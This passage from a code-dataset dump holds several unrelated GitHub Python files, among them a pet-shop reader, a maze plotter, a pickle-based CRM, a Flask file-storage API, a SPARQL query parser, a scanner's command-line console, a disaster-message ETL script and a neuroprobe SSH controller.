len(x))\n    #y_curve = b + (w1 + w2 + w3 + w4 + w5 + w6 + w7 + w8) * x_new\n    #print(x.T[1])\n    plot(losses)\n    #plot2(x.T[1], y, x_new, y_curve, losses)\n    \"\"\"","repo_name":"ShineTakumi/CarDetectionPrediction-Regression-","sub_path":"CarDetection_train.py","file_name":"CarDetection_train.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8237561426","text":"import os\r\n\r\n\r\ndef return_list(path: str) -> list:\r\n    pets = []\r\n    for name_dir in os.listdir(path):\r\n        text_content = ''\r\n        dogs_img = ''\r\n        for name_file in os.listdir(f'{path}/{name_dir}'):\r\n            if name_file.split('.')[1] == 'txt':\r\n                with open(f'{path}/{name_dir}/{name_file}') as f:\r\n                    text_content = f.read()\r\n\r\n            if name_file.split('.')[1] == 'jpg':\r\n                dogs_img = f'{path}/{name_dir}/{name_file}'\r\n\r\n        pets.append({'name': name_dir, 'img': dogs_img, 'text': text_content})\r\n    return pets\r\n\r\n\r\ndef return_dict(path: str) -> dict:\r\n    title_list = path.split('/')[-1]\r\n    return {'title': title_list, 'pets': return_list(path)}\r\n\r\n\r\nDOGS = return_dict('static/content/dogs')\r\nCATS = return_dict('static/content/cats')\r\nFISH = return_dict('static/content/fish')\r\n\r\nprint(DOGS)\r\n","repo_name":"AntonLihtar/pet_shop","sub_path":"read_dogs.py","file_name":"read_dogs.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16263332400","text":"import matplotlib.pyplot as plt\nimport math \nimport random\nimport time\n\nrandom.seed()\n\ndot = None\narw = None\nar_len = 0.2\nstep_len = 1\n\ndef draw_car(ax,x,y,deg):\n    global dot,arw,ar_len\n\n    dx = ar_len* math.cos(math.radians(deg))\n    dy = ar_len* math.sin(math.radians(deg))\n\n    print(x,y, dx,dy)\n\n    if dot is None:\n        dot = ax.scatter(x, y, marker='o', color='blue')\n    else:\n        dot.set_offsets([x,y])\n\n    if arw is not None:\n        arw.remove()\n    arw = ax.arrow(x, y, dx, dy, head_width=0.1, fc='blue', ec='blue')\n\n    return \n\ndef update_color(color = 'blue'):\n    global dot\n    dot.set_color(color) # change the dot's color to the given one\n\ndef deg_noisy(n=1):\n    return random.randint(-n,n)\n\n# read in the maze description\nwith open('maze.txt', 'r') as f:\n    M,W,H = map(int, f.readline().split())\n    walls = []\n    for _ in range(M):\n        x1, y1, x2, y2 = map(int, f.readline().split())\n        walls.append((x1, y1, x2, y2))\n\n# initial position\nx, y = 0.5, 
0.5\ndeg=0\n\n# draw the maze map\nfig, ax = plt.subplots()\nax.set_aspect('equal')\nfig.set_size_inches(10,10)\nax.set_xlim([-1,W+1])\nax.set_ylim([-1,H+1])\nfor x1, y1, x2, y2 in walls:\n    ax.plot([x1, x2], [y1, y2], color='black')\n    \ndraw_car(ax,x,y,deg)\n\n\nplt.show()","repo_name":"mxy161610207/cpscps_testbed","sub_path":"test_lab/test-log/draw_maze copy.py","file_name":"draw_maze copy.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11739769265","text":"import os\r\nimport time\r\nimport pickle\r\n\r\n#creating a new customer object and saving it into a separate .obj file.\r\ndef createCustomer():\r\n\r\n    naming = input(\"name of customer:\")\r\n\r\n    emailContact = input(\"email of the customer:\")\r\n\r\n    phoneNumber = input(\"mobile phone number:\")\r\n\r\n    #next contact needs a way to know the current date and compare the dueDate\r\n    dueDate = input(\"next time the customer will need our attention\\n \")\r\n    newCustomer = customer(naming,emailContact,phoneNumber,dueDate)\r\n    saveThis = input(\"\"\"would you like to save the customer with the following details?\r\n    %s\r\n    email:%s\r\n    phone number:%s\r\n    next contact date %s\r\n    type y to save or n to discard, then ENTER: \\n\"\"\" % (naming , emailContact, phoneNumber, dueDate ))\r\n    if saveThis == \"y\":\r\n\r\n        #setting the path inside the current working directory\r\n        customerFile = os.path.join(os.getcwd(), naming + \".obj\")\r\n\r\n        #creating a variable that accesses the file in binary write mode\r\n        writingCustomer = open(customerFile,\"wb\")\r\n\r\n        #saving the customer details to the .obj file\r\n        pickle.dump(newCustomer, writingCustomer)\r\n        \r\n    elif saveThis == \"n\":\r\n        print(\"discarded\")  \r\n        return\r\n    else:\r\n        print(\"invalid input. discarding\")\r\n        return\r\n\r\n\r\n#retrieving an object and showing its contents in a readable format.\r\ndef showCustomer(NameSearch):\r\n\r\n    #setting up the path to the file in a variable\r\n    customerFile = os.path.join(os.getcwd(), NameSearch + \".obj\")\r\n\r\n    #a variable that accesses the file in binary read mode \r\n    reading = open(customerFile, \"rb\")\r\n\r\n    #loading the file with pickle\r\n    current = pickle.load(reading)\r\n\r\n    #printing the customer attributes\r\n    print(\r\n\"\"\"name:%s\r\nphone:%s\r\nemail:%s\r\nnext date to contact the customer:%s\"\"\"%(current.name, current.phone, current.email, current.nextContact))\r\n\r\n    return\r\n\r\n\r\n\r\n\r\n#customer class takes the customer details and logs the date of creation of the object. 
an empty log exists in the form of a list variable with no entries\r\n#has a newLog function that saves an entry date and a structured text (string) entry followed by a customized note\r\n\r\n#a method that uses time.strftime('%Y-%m-%d') to compare the due date with the current date and add the customer to a list in the main menu\r\n\r\nclass customer:\r\n    \"customer details and contact information, contact log\"\r\n    def __init__(self,name, email, phone, nextContact):\r\n\r\n        #customer first and last name\r\n        self.name = name\r\n\r\n        #customer email of contact\r\n        self.email = email\r\n\r\n        #customer mobile phone number\r\n        self.phone = phone\r\n        \r\n        #next date to contact this customer\r\n        self.nextContact = nextContact\r\n\r\n        self.log = []\r\n        #date of submission of the customer to the system\r\n        logDate = time.asctime(time.localtime(time.time()))\r\n\r\n\r\n        #each log entry is a dictionary in date:string format\r\n        self.log.append({logDate: \"i was created\"})\r\n    #newLog method for creating a new log entry in the log variable \r\n    def newLog(self, note):\r\n        \r\n        logDate = time.asctime(time.localtime(time.time()))\r\n        self.log.append({logDate: note})\r\n        return\r\n    \r\n    \r\n\r\n\r\n    \r\n","repo_name":"aswe323/backup","sub_path":"matanCRC.py","file_name":"matanCRC.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71742013928","text":"#! python3\n\n# madlib-solidifying.py - A program which replaces specified words with user input, saves the result to a new file and prints it to the console.\n\n# Create variable with words to exchange.\nwords = ['ADJECTIVE', 'ADVERB', 'VERB', 'NOUN']\n\n# Open file with text to check.\nwith open('textfile.txt') as textfile:\n# Split text.\n    splitted_text = textfile.read().split()\n    print(splitted_text)\n\n# Open new file to save new text and use for loop to exchange specified words.\nwith open('changedtext.txt', 'w') as newtext:\n    for x in splitted_text:\n        for y in words:\n            if x.startswith(y):\n                word = input('Please enter ' + y.lower() + ':' + '\\n')\n                newtext.write(x.replace(y, word) + ' ')\n                break\n        else:\n            newtext.write(x + ' ')\n\n# Remove space from the end of the text and print new text to the screen.\nwith open('changedtext.txt') as newtext:\n    content = ' '.join(x.strip() for x in newtext.readlines())\n    print(content)\n\n# Save changed text without needless space at the end.\nwith open('changedtext.txt', 'w') as newtext:\n    newtext.write(content)\n","repo_name":"jakubfolta/MadLibs","sub_path":"madlib-solidifying.py","file_name":"madlib-solidifying.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15808483028","text":"from flask_restful import Resource, abort, marshal, request, reqparse\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom werkzeug.datastructures import FileStorage\nfrom Serializers.StorageFields import storage_fields\nfrom Serializers.StorageElementFields import storage_element_fields\nfrom Models.Users.UserModel import UserModel\n\nfrom Utils.file_operators import get_file_size, GigaByte\n\nclass UserStorageResource(Resource):\n    @jwt_required\n    def get(self):\n        user_identity = get_jwt_identity()\n        user = UserModel.get_user(login = user_identity)\n        if user is None:\n            
abort(500, message = 'Something went wrong.')\n        return marshal(user.storage, storage_fields), 200\n    \n    @jwt_required\n    def post(self):\n        user_identity = get_jwt_identity()\n        user = UserModel.get_user(login = user_identity)\n        if user is None:\n            abort(500, message = 'Something went wrong.')\n        parser = reqparse.RequestParser()\n        parser.add_argument('file' , required = True, type=FileStorage, location = 'files')\n        file = parser.parse_args()['file']\n        file_size = get_file_size(file)\n        used_space = user.storage.used_space\n        if file_size + used_space >= 10*GigaByte:\n            abort(400, message = 'File storage capacity exceeded. File not uploaded')\n        stElement = user.storage.add_file(file)\n        return marshal(user.storage, storage_fields), 200\n\n    @jwt_required\n    def delete(self): \n        user_identity = get_jwt_identity()\n        user = UserModel.get_user(login = user_identity)\n        if user is None:\n            abort(500, message = 'Something went wrong.')\n        user.storage.clear()\n        return marshal(user.storage, storage_fields), 204\n    \n","repo_name":"cezary-kania/UploadIO-api","sub_path":"src/Resources/Users/Storage/UserStorageResource.py","file_name":"UserStorageResource.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16017063008","text":"import rdflib\nimport re\n\nclass Query:\n    def __init__(self, filename):\n        self.filename = filename\n        with open(filename, 'r') as f:\n            text = f.read().replace(\"\\\\n\\\\\\n\", \" \")\n\n        namespace_pattern = \"prefix (\\w*): <([^>]*)>\"\n        matches = re.findall(namespace_pattern, text)\n        self.namespaces = {}\n        for m in matches:\n            self.namespaces[m[0]] = rdflib.Namespace(m[1])\n\n        sql_pattern = \"sql=(.*)\\n\"\n        matches = re.findall(sql_pattern, text)\n        assert len(matches) == 1\n        self.sql_query = matches[0]\n        # print(\"SQL: \", self.sql_query)\n\n        sparql_pattern = \"sparql.*(SELECT.*)\\n\"\n        matches = re.findall(sparql_pattern, text)\n        assert len(matches) == 1\n        self.sparql_query = matches[0]\n        # print(\"SPARQL: \", self.sparql_query)\n\n        triples_pattern = \"WHERE {(.*)}\"\n        matches = re.findall(triples_pattern, self.sparql_query)\n        if len(matches) != 1:\n            triples_pattern = \"{(.*)}\"\n            matches = re.findall(triples_pattern, text)\n            assert len(matches) == 1\n        \n        self.triples = recover_triples(matches[0])\n        self.logic = triples_to_logic(self.triples)\n\n        selects_pattern = \"SELECT(.*)WHERE\"\n        matches = re.findall(selects_pattern, self.sparql_query)\n        if len(matches) != 1:\n            selects_pattern = \"SELECT(.*){\"\n            matches = re.findall(selects_pattern, text)\n            assert len(matches) == 1\n        self.selects = recover_selects(matches[0])\n        # print(\"SELECTS: \", self.selects)\n\n    def create_supervision(self):\n        if len(self.triples) > 1:\n            return False, None, None\n        \n        subj, pred, obj = self.triples[0]\n        if pred == \"rdf:type\":\n            pred = obj\n        pred = re.sub(\"<.*#(.*)>\", r'\\1', pred)\n        pred = re.sub(\":\", \"\", pred)\n        \n        sql_query = self.sql_query.replace(\"COUNT(*)\", \"x\")\n        # print(\"query: \", sql_query)\n        return True, pred, sql_query\n\n\n\ndef recover_triples(triplestring):\n    parts = triplestring.split()\n    triples = []\n    subject = None\n    predicate = None\n    position = 0\n    for p in parts:\n        if p == \".\":\n            continue\n        if position == 0: # expecting subject\n            subject = p\n            position = 1\n        elif position == 1: # expecting predicate\n            predicate = p\n            if predicate == \"a\":\n                predicate = \"rdf:type\"\n            position = 2\n        elif position == 2:\n            if p[-1] == \";\":\n                triples.append((subject, predicate, p[:-1]))\n                position = 1\n            else:\n                triples.append((subject, predicate, p))\n                position = 0\n    return triples\n\ndef recover_selects(selectstring):\n    selects = selectstring.split()\n\n    # TODO: only supports a list of ?varname at the moment\n    for s in selects:\n        if 
s[0] != \"?\":\n            return None\n    return selects\n\ndef triples_to_logic(triples):\n    logic = []\n    reformulated = []\n    identities = []\n    for t in triples:\n        if t[1] == \"rdf:type\":\n            logic.append([t[2],t[0]])\n            h = hash(t[2])\n            # reformulated.\n        else:\n            logic.append([t[1],t[0], t[2]])\n    return logic\n","repo_name":"zsoltzombori/mapping","sub_path":"extract/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5472230726","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : console.py\n@Time : 2020/12/24 16:36:36\n@Author: Morker\n@Blog : https://96.mk/\n@Email : i@96.mk\n\nIf you don't go through the cold, you can't get the fragrant plum blossom.\n'''\n\nimport os\nimport sys\nimport inspect\nimport argparse\nfrom lib.option import initOption\nfrom config.config import pyVersion, urlVersion\nfrom config.data import logger\n\n\ndef version_check():\n    if pyVersion < \"3.7.3\":\n        logger.error(\n            \"This Python version ('{0}') is incompatible; to run Glass successfully you must use a version >= 3.7.3 (visit 'https://www.python.org/downloads/')\".format(pyVersion))\n        exit(0)\n\n    if urlVersion > \"1.25.8\" and pyVersion > \"3.8\":\n        logger.error(\"The urllib3 library version ('{0}') is incompatible; proxies are likely to fail\".format(urlVersion))\n        logger.info('Run (python3 -m pip install -U \"urllib3==1.25.8\") to downgrade the library')\n        logger.info(\n            \"Or run (python3 -m pip install -r requirements.txt) to install all required libraries\")\n        exit(0)\n\n\ndef modulePath():\n    \"\"\"\n    This will get us the program's directory, even if we are frozen\n    using py2exe\n    \"\"\"\n\n    try:\n        _ = sys.executable if hasattr(sys, \"frozen\") else __file__\n    except NameError:\n        _ = inspect.getsourcefile(modulePath)\n\n    return os.path.dirname(os.path.realpath(_))\n\n\ndef main():\n    version_check()\n    parser = argparse.ArgumentParser(description=\"Glass scan.\")\n    parser.add_argument('-i', '--ip', type=str,\n                        dest='ip', help='Input your ip.')\n    parser.add_argument('-f', '--file', type=str,\n                        dest='file', help='Input your ips.txt.')\n    parser.add_argument('-u', '--url', type=str,\n                        dest='url', help='Input your url.')\n    parser.add_argument('-w', '--web', type=str,\n                        dest='web', help='Input your webs.txt.')\n    parser.add_argument('--proxy', type=str, dest='proxy',\n                        help='Input your proxy options(all or cn) or proxy address(127.0.0.1:8080).')\n    parser.add_argument('--proxy-list', type=str,\n                        dest='proxylist', help='List the proxys.')\n    parser.add_argument('-v', '--version', dest='version',\n                        action='store_true', help=\"Show program's version number and exit.\")\n    parser.add_argument('--update', dest='updateprogram',\n                        action='store_true', help=\"Update the program.\")\n    parser.add_argument('-o', '--output', type=str,\n                        dest='outputTarget', help='Select the output format.')\n    parser.add_argument('-s', '--search', type=str,\n                        dest='search', help='Choose your search engine.')\n    args = parser.parse_args()\n    usage = '''\nUsage: python3 {} -i 127.0.0.1 or 127.0.0.0/24\nUsage: python3 {} -u 127.0.0.1 -s eye or fofa\nUsage: python3 {} -f ips.txt\nUsage: python3 {} -u https://96.mk/\nUsage: python3 {} -w webs.txt\nUsage: python3 {} --proxy-list all or cn\nUsage: python3 {} (-i -f -u -w) 127.0.0.1 or 127.0.0.0/24 --proxy all or cn\nUsage: python3 {} --update\nUsage: python3 {} -u https://96.mk/ -o html\n    '''.format(parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog, parser.prog)\n    root = modulePath()\n    initOption(usage, root, 
args.__dict__)\n","repo_name":"s7ckTeam/Glass","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":897,"dataset":"github-code","pt":"53"} +{"seq_id":"73439177127","text":"dados= []\ncontador = 0\nsoma = 0\nfor i in range(0,6):\n    dados.append(float(input()))\n    if dados[i] > 0:\n        contador += 1\n        soma += dados[i]\n\nmedia = soma / contador\n\nprint('{} valores positivos'.format(contador))\nprint('{:.1f}'.format(media))\n","repo_name":"gabrielreiss/URI","sub_path":"1064.py","file_name":"1064.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74325833769","text":"#https://algoprog.ru/material/p915\n\nn = int(input())\narray = [*map(int, input().split())]\n\ndp = [0] * (n + 1)\ndp[1] = array[0]\nfor i in range(2, n + 1):\n    dp[i] = min(dp[i-1], dp[i-2]) + array[i-1]\nprint(dp[-1])\n","repo_name":"dmironov1993/algoprog","sub_path":"Уровень2/Уровень2Б/Простые_задачи_на_ДП/Платная_лестница.py","file_name":"Платная_лестница.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28376243686","text":"import utils\n\nfrom typing import List, Optional, Union\nfrom postDB import types, Model, Column\n\nfrom ..permissions import Administrator\nfrom ..permissions.bases import BasePermission\n\n\nclass Role(Model):\n    \"\"\"\n    Role class\n\n    Database Attributes:\n        Attributes stored in the `roles` table.\n        :param int id: Role ID.\n        :param str name: Role name.\n        :param int color: The color this role is.\n        :param int position: The position this role is in the hierarchy.\n        :param int permissions: The permissions this role has.\n    \"\"\"\n\n    id = Column(types.Integer(big=True), primary_key=True)\n    name = Column(types.String(length=32), unique=True)\n    position = Column(types.Real)\n    color = Column(types.Integer, nullable=True)\n    permissions = Column(types.Integer, default=0)\n\n    def __repr__(self):\n        # reconstructed format string; the original was lost to markup stripping, fields taken from the columns above\n        return (\n            \"<Role id={0.id} name={0.name!r} position={0.position} color={0.color} permissions={0.permissions}>\".format(self)\n        )\n\n    @classmethod\n    async def fetch(cls, id: Union[str, int]) -> Optional[\"Role\"]:\n        \"\"\"Fetch a role with the given ID.\"\"\"\n        query = \"\"\"SELECT * FROM roles WHERE id = $1;\"\"\"\n        role = await cls.pool.fetchrow(query, int(id))\n\n        if role is not None:\n            role = cls(**role)\n\n        return role\n\n    def has_permissions(self, permissions: List[Union[int, BasePermission]]) -> bool:\n        \"\"\"Returns `True` if this role has all provided permissions\"\"\"\n        if self.permissions & Administrator().value:\n            return True\n\n        all_perms = 0\n        for perm in permissions:\n            if isinstance(perm, int):\n                all_perms |= perm\n            else:\n                all_perms |= perm.value\n\n        return self.permissions & all_perms == all_perms\n\n    def has_permission(self, permission: Union[BasePermission, int]) -> bool:\n        \"\"\"Returns `True` if this role has the provided permission\"\"\"\n        if self.permissions & Administrator().value:\n            return True\n\n        if isinstance(permission, int):\n            return self.permissions & permission == permission\n\n        return self.permissions & permission.value == permission.value\n\n    @property\n    def created_at(self):\n        return utils.snowflake_time(self.id)\n","repo_name":"Tech-With-Tim/models","sub_path":"roles/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24658184976","text":"from bs4 
import BeautifulSoup\n\nif __name__ == \"__main__\":\n from utils import *\nelse:\n from .utils import *\n\n\nclass Lylblog(Site):\n def __init__(self):\n super(Site, self)\n\n def matcher(self, url: str):\n return 'lylblog.com' in url\n\n def solver(self, url: str):\n res = get(\"https://www.lylblog.com/\")\n soup = BeautifulSoup(res, features=\"lxml\")\n posts = []\n for item in soup.select(\"article.post\"):\n link = item.select_one(\"a.post-title\")\n posts.append(\n Post(\n link.get_text(),\n link.get(\"href\"),\n parseToUnix(item.select_one(\"time\").get_text())\n ))\n return posts\n\n\nif __name__ == '__main__':\n t = Lylblog()\n print(t.matcher(\"https://www.lylblog.com/\"))\n print(t.solver(\"https://www.lylblog.com/\"))\n","repo_name":"OhYee/blotter","sub_path":"tools/spider/sites/lylblog.py","file_name":"lylblog.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"19226337807","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 24 22:54:58 2020\r\n\r\n@author: ZY\r\n\"\"\"\r\nimport sys\r\nimport pandas as pd\r\nfrom sqlalchemy import create_engine\r\n# print ('Number of arguments:', len(sys.argv), 'arguments.')\r\n# print ('Argument List:', str(sys.argv))\r\n\r\n\r\ndef print_input(messages_filepath, categories_filepath, database_filepath):\r\n \"\"\" \r\n A function to print out the input file paths. \r\n \r\n Parameters\r\n ----------\r\n messages_filepath : String\r\n The file path for the message data.\r\n categories_filepath : String\r\n The file path for the category data\r\n database_filepath : String\r\n The file path for the database \r\n\r\n Returns\r\n -------\r\n messages : pandas.dataframe\r\n a dataframe that contains the message data\r\n categories : pandas.dataframe\r\n a dataframe that contains the category data\r\n\r\n \"\"\"\r\n print ('The message file is:', messages_filepath)\r\n messages = pd.read_csv(messages_filepath)\r\n print ('The category file is:', categories_filepath)\r\n categories = pd.read_csv(categories_filepath)\r\n print ('The saving database is:', database_filepath) \r\n return messages, categories\r\n\r\ndef prepare_data(messages, categories):\r\n \"\"\"\r\n Merge the two dataframe\r\n\r\n Parameters\r\n ----------\r\n messages : pandas.dataframe\r\n a dataframe that contains the message data\r\n categories : pandas.dataframe\r\n a dataframe that contains the category data\r\n\r\n Returns\r\n -------\r\n df : pandas.dataframe\r\n merged dataframe\r\n\r\n \"\"\" \r\n \r\n df = pd.concat([messages.set_index('id'),categories.set_index('id')], axis=1).reset_index()\r\n \r\n # make a new dataframe that contains splitting of categories column\r\n categories = df['categories'].str.split(';', expand = True)\r\n row = categories.loc[1,:]\r\n category_colnames = [xx[:-2] for xx in row]\r\n categories.columns = category_colnames\r\n for column in categories.columns:\r\n # set each value to be the last character of the string\r\n categories[column] = [xx[-1:] for xx in categories[column]] \r\n # convert column from string to numeric\r\n categories[column] = pd.to_numeric(categories[column])\r\n \r\n # Drop the original 'categories' and merge with new one. 
\r\n df.drop(labels=['categories'], axis=1,inplace=True)\r\n df = pd.concat([df,categories], axis =1)\r\n \r\n # drop duplicates\r\n df.drop_duplicates(subset=['message'], inplace= True)\r\n \r\n # replace '2' by '1' in the column 'related'\r\n df['related'].replace(2,1, inplace=True)\r\n \r\n # the column 'military' has only zero. Cannot be used in training. Delete the column\r\n # df.drop(labels=['military'],axis=1,inplace=True)\r\n \r\n return df\r\n\r\n\r\ndef save_database(df, database_filepath):\r\n '''\r\n Save the data to local database\r\n\r\n Parameters\r\n ----------\r\n df : pandas.dataframe\r\n data to be saved\r\n database_filepath : String\r\n The file path for the database \r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n '''\r\n \r\n engine = create_engine('sqlite:///' + database_filepath)\r\n table_name = database_filepath.replace('/', '.').split('.')[-2]\r\n df.to_sql(table_name, engine, index=False)\r\n\r\ndef main():\r\n '''\r\n The main function for the file\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n '''\r\n if len(sys.argv) == 4:\r\n \r\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\r\n # Read the input files\r\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\r\n .format(messages_filepath, categories_filepath))\r\n messages, categories = print_input(messages_filepath, \r\n categories_filepath, \r\n database_filepath)\r\n \r\n # Prepare the output data\r\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\r\n .format(messages_filepath, categories_filepath))\r\n print('Cleaning data...')\r\n df = prepare_data(messages, categories)\r\n \r\n # Save to a local sql file\r\n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\r\n save_database(df, database_filepath)\r\n \r\n print('Cleaned data saved to database!')\r\n \r\n else:\r\n print('Please provide the filepaths of the messages and categories '\\\r\n 'datasets as the first and second argument respectively, as '\\\r\n 'well as the filepath of the database to save the cleaned data '\\\r\n 'to as the third argument. 
\\n\\nExample: python process_data.py '\\\r\n 'disaster_messages.csv disaster_categories.csv '\\\r\n 'DisasterResponse.db')\r\n \r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"hellogaga/Disaster_Response_Message_Classification","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17385864018","text":"import pandas as pd\n\n# Read csv files\ndf_processed_data = pd.read_csv('./data/processed_data.csv', index_col=[0])\ndf_new_data = pd.read_csv('./data/new_data.csv', index_col=[0])\n\n# Joining\ndf_ = pd.concat([df_processed_data, df_new_data], axis=1)\n\n# Saving to csv file\ndf_.to_csv('./data/samambaia_houses.csv')","repo_name":"davi-santos/samambaia-house-price-prediction","sub_path":"JoinCSV.py","file_name":"JoinCSV.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75003857767","text":"import logging\nimport os\nimport queue\nimport re\nimport threading\nimport time\nfrom typing import Dict\n\nimport psutil\n\nfrom devices.common.ssh_connection import SshConnection\n\nDEVICE_SCLK_FREQ = 200_000_000.\nMAX_SAMPLES_PER_SEC = 40_000.\n\n\nclass NeuroprobeDeviceProcess:\n def __init__(self, rcv_queue, send_queue, parent_pid, config: Dict):\n self.rcv_queue = rcv_queue\n self.send_queue = send_queue\n self.parent_pid = parent_pid\n self.last_parent_exit_check_time = time.time()\n\n self.ssh_connection = SshConnection(config)\n self.last_ssh_connection_check = time.time()\n self.connected = False\n\n self.device_init_commands = config['device_init_commands']\n self.log = logging.getLogger(__name__)\n self.log.setLevel(logging.INFO)\n\n # It's convenient for the device to always start in \"not connected\" state.\n # This makes device switching logic easier.\n self.emit_device_state({'isConnected': False})\n\n def exec_device_command(self, command: str):\n self.ssh_connection.exec_device_command(command)\n self.check_and_send_device_state()\n\n def initialize_device(self):\n num_init_steps = len(self.device_init_commands)\n self.emit_device_state({'initState': 'INITIALIZING',\n 'initStepDone': 0,\n 'numInitSteps': num_init_steps})\n\n for i in range(num_init_steps):\n command = self.device_init_commands[i]\n self.emit_device_state({'log': command})\n result = self.ssh_connection.exec_ssh(self.device_init_commands[i])\n self.emit_device_state({'initState': 'INITIALIZING',\n 'initStepDone': i,\n 'numInitSteps': num_init_steps,\n 'log': result})\n\n self.check_and_send_device_state()\n\n def check_and_send_device_state(self):\n device_state_str = self.ssh_connection.exec_get_device_state()\n if device_state_str is None:\n self.emit_device_state({'isConnected': False})\n return\n\n match_groups = \\\n re.match('([0-9a-f]+),([0-9a-f]+),([01]),([01]),([01]),([01]),([01]),([01]),([0-9a-f]+),([01]),([01])',\n # rdh_SampleDur^ rhd_BootFailed^ ^rhd_SampleActive\n device_state_str.strip())\n\n device_state_msg = {'isConnected': True}\n\n if not match_groups:\n device_state_msg['initState'] = 'NOT_INITIALIZED'\n\n elif (match_groups.group(10) != \"0\"): # or (match_groups.group(3) != \"00000002\"):\n device_state_msg['initState'] = \"INIT_FAILED\"\n\n else:\n device_state_msg['initState'] = 'INITIALIZED'\n device_state_msg['isSampling'] = match_groups.group(11) == \"1\"\n\n # FIXME: get sampledur position from Rakshith\n 
sample_duration_sclk = int(match_groups.group(9), 16)\n samples_per_sec = DEVICE_SCLK_FREQ / sample_duration_sclk\n device_state_msg['samplesPerSec'] = samples_per_sec\n\n self.emit_device_state(device_state_msg)\n\n def process_message(self, msg: Dict):\n if 'checkDeviceState' in msg:\n self.check_and_send_device_state()\n\n if 'initializeDevice' in msg:\n self.initialize_device()\n\n if 'command' in msg:\n self.exec_device_command(msg['command'])\n\n if 'setSamplingRate' in msg:\n self.set_sampling_rate(msg['setSamplingRate'])\n\n if 'startSampling' in msg:\n self.exec_device_command('rhd_sample_en')\n\n if 'stopSampling' in msg:\n self.exec_device_command('rhd_sample_dis')\n\n\n def process_messages(self):\n while True:\n self.exit_if_parent_exists()\n\n try:\n msg = self.rcv_queue.get_nowait()\n self.process_message(msg)\n except queue.Empty:\n break\n\n def run_loop(self):\n while True:\n now = time.time()\n\n if now > (self.last_ssh_connection_check + 5):\n self.last_ssh_connection_check = now\n conn_check_thread = threading.Thread(target=self.run_connection_check)\n conn_check_thread.start()\n\n self.process_messages()\n time.sleep(0.001)\n\n def run_connection_check(self):\n was_connected = self.connected\n self.connected = self.ssh_connection.ensure_connection()\n\n if not was_connected and self.connected:\n self.check_and_send_device_state()\n\n else:\n self.emit_device_state({'isConnected': self.connected})\n\n def exit_if_parent_exists(self):\n now = time.time()\n\n if now <= self.last_parent_exit_check_time + 1:\n return\n\n self.last_parent_exit_check_time = now\n\n if self.parent_pid not in psutil.pids():\n os.abort()\n\n def emit_device_state(self, state):\n self.send_queue.put_nowait({'state': state})\n\n def set_sampling_rate(self, rate):\n adjusted_rate = min(rate, MAX_SAMPLES_PER_SEC)\n sample_duration_sck = int(round(DEVICE_SCLK_FREQ / adjusted_rate))\n self.exec_device_command(f'rhd_sample_dur {sample_duration_sck}')\n\n\ndef run_controller(rcv_queue, send_queue, parent_pid, config: Dict):\n stimulator = NeuroprobeDeviceProcess(rcv_queue, send_queue, parent_pid, config)\n stimulator.run_loop()\n","repo_name":"OpenMEA/OpenMEA_Studio","sub_path":"engine/devices/neuroprobe/neuroprobe_device_process.py","file_name":"neuroprobe_device_process.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13921265111","text":"from tempfile import NamedTemporaryFile, TemporaryDirectory\n\nimport numpy as np\nimport pytest\nimport torch\n\nimport mmdeploy.backend.onnxruntime as ort_apis\nfrom mmdeploy.codebase import import_codebase\nfrom mmdeploy.utils import Codebase, load_config\nfrom mmdeploy.utils.test import SwitchBackendWrapper\n\ntry:\n import_codebase(Codebase.MMPOSE)\nexcept ImportError:\n pytest.skip(\n f'{Codebase.MMPOSE.value} is not installed.', allow_module_level=True)\n\nfrom .utils import (generate_datasample, generate_mmpose_deploy_config,\n generate_mmpose_task_processor)\n\nmodel_cfg_path = 'tests/test_codebase/test_mmpose/data/model.py'\nmodel_cfg = load_config(model_cfg_path)[0]\ndeploy_cfg = 